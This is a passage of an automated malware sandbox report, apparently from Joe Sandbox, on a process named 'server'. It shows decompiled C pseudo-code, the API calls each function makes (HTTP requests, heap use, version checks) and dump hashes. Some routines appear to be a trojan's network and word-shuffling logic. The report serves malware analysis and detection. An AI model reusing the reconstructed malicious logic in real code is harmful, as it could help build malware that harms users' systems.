0x02b8524a
0x02b851ff
0x02b85206
0x02b85212
0x02b85217
0x02b8522d
0x02b8523d
0x00000000
0x02b8522f
0x02b8522f
0x02b85236
0x02b85243
0x02b85243
0x02b85243
0x02b85236
0x02b8522d
0x02b85248
0x00000000
0x00000000
0x02b8524e

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,02B821E7,?,?,74ACE5D0,00000000), ref: 02B85212
ResetEvent.KERNEL32(?), ref: 02B85217
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02B85224
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02B83F34,00000000,?,?), ref: 02B8522F
GetLastError.KERNEL32(?,?,00000102,02B821E7,?,?,74ACE5D0,00000000), ref: 02B8524A

Part of subcall function 02B82058: lstrlen.KERNEL32(00000000,00000008,?,74AC4670,?,?,02B851F7,?,?,?,?,00000102,02B821E7,?,?,74ACE5D0), ref: 02B82064
Part of subcall function 02B82058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02B851F7,?,?,?,?,00000102,02B821E7,?), ref: 02B820C2
Part of subcall function 02B82058: lstrcpy.KERNEL32(00000000,00000000), ref: 02B820D2

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02B83F34,00000000,?), ref: 02B8523D

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: b90aab66e4500452c321738998164d04204a06c5ad77f934af0bd905646068fc
Instruction ID: f6c85994598231fcfdd0d30f4d25df0f8db4b704017db102b579cc48861c9512
Opcode Fuzzy Hash: b90aab66e4500452c321738998164d04204a06c5ad77f934af0bd905646068fc
Instruction Fuzzy Hash: C501AD31100600ABDB307E64DC44F2BBBAAFF483A5F610A65F49DE21E0DB20E814DB22

Uniqueness

Uniqueness Score: -1.00%

Function 02B82523 Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E02B82523(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02B84520();
				if(_t21 != 0) {
					_t60 =  *0x2b8a2fc; // 0x2000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x2b8a2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2b8a178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02B83037( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x2b8a348; // 0x29fd5b8
					if( *0x2b8a2fc > 5) {
						_t8 = _t26 + 0x2b8b51d; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2b8b9db; // 0x44283a44
						_t27 = _t7;
					}
					E02B84332(_t27, _t27);
					_t31 = E02B8415A(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E02B827A0();
						 *0x2b8a310 =  *0x2b8a310 ^ 0x81bbe65d;
						 *0x2b8a36c = _t32;
						_t33 = E02B833DC(0x60);
						 *0x2b8a3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x2b8a3cc; // 0x5589610
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x2b8a3cc; // 0x5589610
							 *_t52 = 0x2b8b142;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x2b8a2d8, 0, 0x43);
							 *0x2b8a368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x2b8a2fc; // 0x2000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x2b8a348; // 0x29fd5b8
								_t13 = _t59 + 0x2b8b74a; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x2b8927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02B83BD3( ~_v8 &  *0x2b8a310, 0x2b8a00c); // executed
								_t43 = E02B81D8A(0, _t56, _t62, _t64, 0x2b8a00c); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E02B86EA3(_t62); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E02B86815(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E02B85C31(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2b8a17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E02B823C4(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}

0x02b82523
0x02b8252d
0x02b82530
0x02b82533
0x02b82536
0x02b8253d
0x02b8253f
0x02b8254b
0x02b8254d
0x02b8254d
0x02b82556
0x02b8255c
0x02b82561
0x02b8257b
0x02b82587
0x02b82589
0x02b8258e
0x02b82598
0x02b82598
0x02b82590
0x02b82590
0x02b82590
0x02b82590
0x02b8259f
0x02b825ac
0x02b825b3
0x02b825b8
0x02b825b8
0x02b825c1
0x02b825c4
0x02b825ea
0x02b825ef
0x02b825fb
0x02b82600
0x02b82605
0x02b8260a
0x02b8260c
0x02b82638
0x02b8263a
0x02b8260e
0x02b82612
0x02b82617
0x02b8261c
0x02b82623
0x02b82629
0x02b8262e
0x02b82634
0x02b8263b
0x02b8263d
0x02b8263f
0x02b8264e
0x02b82654
0x02b82659
0x02b8265b
0x02b8268b
0x02b8268d
0x02b8265d
0x02b8265d
0x02b82663
0x02b82670
0x02b82676
0x02b82676
0x02b8267e
0x02b82687
0x02b8268e
0x02b82690
0x02b82692
0x02b82699
0x02b826a6
0x02b826ab
0x02b826b0
0x02b826b2
0x02b826b4
0x00000000
0x00000000
0x02b826b6
0x02b826bb
0x02b826bd
0x02b826c4
0x02b826c8
0x02b826cb
0x02b826e0
0x02b826e4
0x02b826e9
0x00000000
0x02b826e9
0x02b826cd
0x02b826cf
0x00000000
0x00000000
0x02b826da
0x02b826dc
0x02b826de
0x00000000
0x00000000
0x00000000
0x02b826de
0x02b826c1
0x02b826c1
0x02b82692
0x02b825c6
0x02b825c6
0x02b825cb
0x02b826eb
0x02b826f0
0x02b826f8
0x02b826f8
0x00000000
0x02b826f0
0x02b825d1
0x02b825d4
0x02b825de
0x02b825e5
0x00000000
0x02b82700
0x02b82700
0x02b82703
0x02b82707
0x02b82707

APIs

Part of subcall function 02B84520: GetModuleHandleA.KERNEL32(4C44544E,00000000,02B8253B,00000001), ref: 02B8452F

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02B825B8

Part of subcall function 02B827A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 02B827C4
Part of subcall function 02B827A0: wsprintfA.USER32 ref: 02B82828

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

memset.NTDLL ref: 02B82612
RtlInitializeCriticalSection.NTDLL(055895D0), ref: 02B82623

Part of subcall function 02B85C31: memset.NTDLL ref: 02B85C4B
Part of subcall function 02B85C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02B85C91
Part of subcall function 02B85C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02B85C9C

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02B8264E
wsprintfA.USER32 ref: 02B8267E

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
String ID:
API String ID: 1825273115-0
Opcode ID: 30a326345e5dc1a3eb98c6e53f3c310be698d8f1fff11d5b3f33934441babf15
Instruction ID: 0f2d6e2b186b7383bfecaa2201a6523ea1ef30b4247f752e8aea5908e6616a06
Opcode Fuzzy Hash: 30a326345e5dc1a3eb98c6e53f3c310be698d8f1fff11d5b3f33934441babf15
Instruction Fuzzy Hash: C251C4B1E81255ABDB21BBB4DC94BAE37E8FB04744F1448D6EA0DE7241E7709950CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B87040 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E02B87040(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				int _t100;
				char _t102;
				unsigned int _t103;
				intOrPtr _t104;
				char* _t108;
				signed int _t111;
				signed int _t114;
				signed int _t119;
				signed int _t123;
				CHAR* _t125;

				_t103 = _a8;
				_t119 = 0;
				_v20 = __eax;
				_t123 = (_t103 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02B833DC(_t123 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t108 = _a4;
				_a4 = _t103;
				_t114 = 0;
				while(1) {
					_t83 =  *_t108;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t119 != 0) {
							if(_t119 > _v8) {
								_v8 = _t119;
							}
							_a8 = _a8 + 1;
							_t119 = 0;
						}
						 *_t108 = 0;
						goto L16;
					} else {
						if(_t119 != 0) {
							L10:
							_t119 = _t119 + 1;
							L16:
							_t108 = _t108 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t114 == _t123) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02B861DA(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0x7b80f884
							_t104 = E02B833DC((_v8 + _t24) * _a8 + 4);
							if(_t104 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t125 = _t104 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2b8a318 = _t104;
								goto L35;
							}
							do {
								_t111 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t111 * 0x19660d;
								__imp__(_t125,  *((intOrPtr*)(_v16 + _t111 % _a8 * 4)));
								__imp__(_t125,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t100 = lstrcmpA( *(_t104 + _v12 * 4), _t125); // executed
									if(_t100 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *(_t104 + _t97 * 4) = _t125;
								__imp__(_t125);
								_v8 = _v8 + 1;
								_t125 =  &(_t125[_t97 + 1]);
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t114 * 4)) = _t108;
						_t102 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t102 = _t102 - 0x20;
						}
						 *_t108 = _t102;
						_t114 = _t114 + 1;
						goto L10;
					}
				}
				if(_t119 != 0) {
					if(_t119 > _v8) {
						_v8 = _t119;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x02b87047
0x02b8704e
0x02b87053
0x02b87056
0x02b8705d
0x02b87060
0x02b87063
0x02b87068
0x02b8706d
0x02b871c1
0x02b871c3
0x02b871c5
0x02b871ca
0x02b871ca
0x02b87073
0x02b87076
0x02b87079
0x02b8707b
0x02b8707b
0x02b8707f
0x00000000
0x00000000
0x02b87083
0x02b870af
0x02b870b4
0x02b870b6
0x02b870b6
0x02b870b9
0x02b870bc
0x02b870bc
0x02b870be
0x00000000
0x02b87089
0x02b8708b
0x02b870aa
0x02b870aa
0x02b870c1
0x02b870c1
0x02b870c2
0x02b870c2
0x02b870c5
0x00000000
0x00000000
0x00000000
0x02b870c5
0x02b8708f
0x02b870d6
0x02b870da
0x02b871b4
0x02b871b6
0x02b871b6
0x02b871b7
0x02b871ba
0x00000000
0x02b871ba
0x02b870e3
0x02b870f4
0x02b870f8
0x02b871b0
0x00000000
0x02b871b0
0x02b870fe
0x02b87101
0x02b87105
0x02b87109
0x02b8710e
0x02b871a6
0x02b871a6
0x00000000
0x02b871ac
0x02b87119
0x02b87122
0x02b87136
0x02b8713d
0x02b87152
0x02b87158
0x02b87160
0x00000000
0x00000000
0x00000000
0x00000000
0x02b87162
0x02b87162
0x02b87169
0x02b87171
0x00000000
0x00000000
0x02b87173
0x02b8717c
0x00000000
0x00000000
0x00000000
0x02b8717e
0x02b87180
0x02b87183
0x02b87183
0x02b87186
0x02b8718a
0x02b8718d
0x02b87193
0x02b87196
0x02b8719d
0x00000000
0x02b87119
0x02b87094
0x02b8709c
0x02b870a2
0x02b870a4
0x02b870a4
0x02b870a7
0x02b870a9
0x00000000
0x02b870a9
0x02b87083
0x02b870c9
0x02b870ce
0x02b870d0
0x02b870d0
0x02b870d3
0x02b870d3
0x00000000

APIs

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

lstrcpy.KERNEL32(43175AC4,00000020), ref: 02B8713D
lstrcat.KERNEL32(43175AC4,00000020), ref: 02B87152
lstrcmpA.KERNEL32(00000000,43175AC4), ref: 02B87169
lstrlen.KERNEL32(43175AC4), ref: 02B8718D

Strings

, xrefs: 02B870D6

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 58c91136e57df5ee7619acfab8c3ecc8d6354752405259a23de4ee526d88983e
Instruction ID: d6d2685a5cbfcf3940680e7be38c4b0cfa79c5baa710378b77140fb0eafda536
Opcode Fuzzy Hash: 58c91136e57df5ee7619acfab8c3ecc8d6354752405259a23de4ee526d88983e
Instruction Fuzzy Hash: 7E51A275A00208EBDF11EF99C884ABDFBB6EF45358F24809AE81D9B205CB709651DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B60005 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02B6024D

Strings

kernel32.dll, xrefs: 02B6008F, 02B60095
cess, xrefs: 02B6018D

Memory Dump Source

Source File: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b60000_server.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
Instruction ID: 53544cded4b9fb4ada908af4d2d7c2be4f6bbf7c5cf2db4aa3c5d4ac2131402f
Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
Instruction Fuzzy Hash: 8FC1AAB5D00228EFDB60CFA9D984BADBBB5FF08304F1480D9E548A7252DB359A94DF11

Uniqueness

Uniqueness Score: -1.00%

Function 02B84358 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02B843B5
SysAllocString.OLEAUT32(02B84D42), ref: 02B843F9
SysFreeString.OLEAUT32(00000000), ref: 02B8440D
SysFreeString.OLEAUT32(00000000), ref: 02B8441B

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 362f6811bb07e42e3149575f7fc18ec423188b649f6e3cf6e52e5b794d8ec2c7
Instruction ID: 2c709e195f322ce3b476361b3b92c423acaa7df4c2ac061e22bbc4ab4fc67d18
Opcode Fuzzy Hash: 362f6811bb07e42e3149575f7fc18ec423188b649f6e3cf6e52e5b794d8ec2c7
Instruction Fuzzy Hash: 4231307590020AEFCB04DF98D8D09AE7BB9FF58344B15846EF90AD7250D7309641CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02B85364 Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02B85364(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x2b8a3cc; // 0x5589610
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2b8a3cc; // 0x5589610
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x2b8a030) {
					HeapFree( *0x2b8a2d8, 0, _t8);
				}
				_t9 = E02B812C6(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x2b8a3cc; // 0x5589610
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x02b85364
0x02b85364
0x02b8536d
0x02b8537d
0x02b8537d
0x02b85382
0x02b85387
0x00000000
0x00000000
0x02b85377
0x02b85377
0x02b85389
0x02b8538d
0x02b8539f
0x02b8539f
0x02b853aa
0x02b853af
0x02b853b2
0x02b853b7
0x02b853bb
0x02b853c1

APIs

RtlEnterCriticalSection.NTDLL(055895D0), ref: 02B8536D
Sleep.KERNEL32(0000000A), ref: 02B85377
HeapFree.KERNEL32(00000000,00000000), ref: 02B8539F
RtlLeaveCriticalSection.NTDLL(055895D0), ref: 02B853BB

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: a75539dbb56abaf073c624967e03748fa7d1023f6967b88725786bd5f442e03e
Instruction ID: f32e86a55ccc3b1f4df39214770a880ea43b75021e67bc11f128ce12a65950d0
Opcode Fuzzy Hash: a75539dbb56abaf073c624967e03748fa7d1023f6967b88725786bd5f442e03e
Instruction Fuzzy Hash: 6BF0F871A80641EBEB21AFA8DC48F263BF9EF04381B05C855F64ED7261D770D860DB25

Uniqueness

Uniqueness Score: -1.00%

Function 02B85251 Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B85251(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02B86ADC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2b8a348; // 0x29fd5b8
				_t4 = _t24 + 0x2b8bc70; // 0x5589228
				_t5 = _t24 + 0x2b8bb60; // 0x4f0053
				_t26 = E02B833F1( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2b8a348; // 0x29fd5b8
						_t11 = _t32 + 0x2b8bcc8; // 0x5589280
						_t48 = _t11;
						_t12 = _t32 + 0x2b8bb60; // 0x4f0053
						_t52 = E02B85DE4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2b8a348; // 0x29fd5b8
							_t13 = _t35 + 0x2b8bcf0; // 0x30314549
							if(E02B85157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x2b8a2fc - 6;
								if( *0x2b8a2fc <= 6) {
									_t42 =  *0x2b8a348; // 0x29fd5b8
									_t15 = _t42 + 0x2b8bcd2; // 0x52384549
									E02B85157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2b8a348; // 0x29fd5b8
							_t17 = _t38 + 0x2b8bbb8; // 0x5589170
							_t18 = _t38 + 0x2b8bc1c; // 0x680043
							_t45 = E02B85B0E(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x2b8a2d8, 0, _t52);
						}
					}
					HeapFree( *0x2b8a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02B87220(_t54);
				}
				return _t45;
			}

0x02b85251
0x02b85261
0x02b85264
0x02b8526b
0x02b8526d
0x02b8526d
0x02b85270
0x02b85275
0x02b8527c
0x02b85289
0x02b8528e
0x02b85292
0x02b852a0
0x02b852ae
0x02b852b2
0x02b85343
0x02b85343
0x02b852b8
0x02b852b8
0x02b852bd
0x02b852bd
0x02b852c4
0x02b852d0
0x02b852d2
0x02b852d4
0x02b852d6
0x02b852dd
0x02b852ef
0x02b852f1
0x02b852f8
0x02b852fa
0x02b85301
0x02b8530c
0x02b8530c
0x02b852f8
0x02b85311
0x02b85316
0x02b8531d
0x02b8533b
0x02b8533d
0x02b8533d
0x02b852d4
0x02b8534f
0x02b8534f
0x02b85351
0x02b85356
0x02b85358
0x02b85358
0x02b85363

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05589228,00000000,?,74AD3E00,00000000,74AD3E20), ref: 02B852A0
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05589170,?,00000000,30314549,00000014,004F0053,05589280), ref: 02B8533D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02B868B6), ref: 02B8534F

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: cb754b40639b8bbd966821c34508d1a07f9f158eaca64e208db8f1c1c38de05d
Instruction ID: 00513cbcfd919a7546f591538178a6489034919166735732b651eed2e87ac96d
Opcode Fuzzy Hash: cb754b40639b8bbd966821c34508d1a07f9f158eaca64e208db8f1c1c38de05d
Instruction Fuzzy Hash: 9331C031940208FFDB21EBA5DC84EAE7BBDEB04744F5640A6F60DAB120DB709A59DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B812C6 Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E02B812C6(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E02B833DC(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x2b89278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x02b812ca
0x02b812d7
0x02b812d9
0x02b812da
0x02b812e2
0x02b812e2
0x02b812e6
0x00000000
0x00000000
0x02b812dd
0x02b812de
0x02b812e1
0x02b812e1
0x02b812ee
0x02b812f3
0x02b812f8
0x02b81300
0x02b81306
0x02b81308
0x02b8130b
0x02b8130f
0x02b81311
0x02b81314
0x02b81314
0x02b81315
0x02b81317
0x02b81314
0x02b81321
0x02b81324
0x02b81327
0x02b81328
0x02b8132a
0x02b81331
0x02b81331
0x02b8133d

APIs

StrChrA.SHLWAPI(?,00000020,00000000,0558960C,?,?,02B853AF,?,0558960C), ref: 02B812E2
StrTrimA.KERNELBASE(?,02B89278,00000002,?,02B853AF,?,0558960C), ref: 02B81300
StrChrA.SHLWAPI(?,00000020,?,02B853AF,?,0558960C), ref: 02B8130B

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
